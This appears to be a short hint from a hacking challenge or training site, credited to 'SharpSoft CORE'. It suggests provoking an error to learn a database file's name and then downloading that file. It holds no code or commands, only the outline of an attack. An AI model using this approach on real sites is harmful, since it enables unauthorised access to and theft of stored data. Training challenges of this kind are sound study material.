It would be a lot easier to hack if you had access to the database file. It may be possible to find out what this is called if you send some data that will cause an error. Try to work out how to do this. If you find the name of the database, download it
Content provided by SharpSoft
CORE™
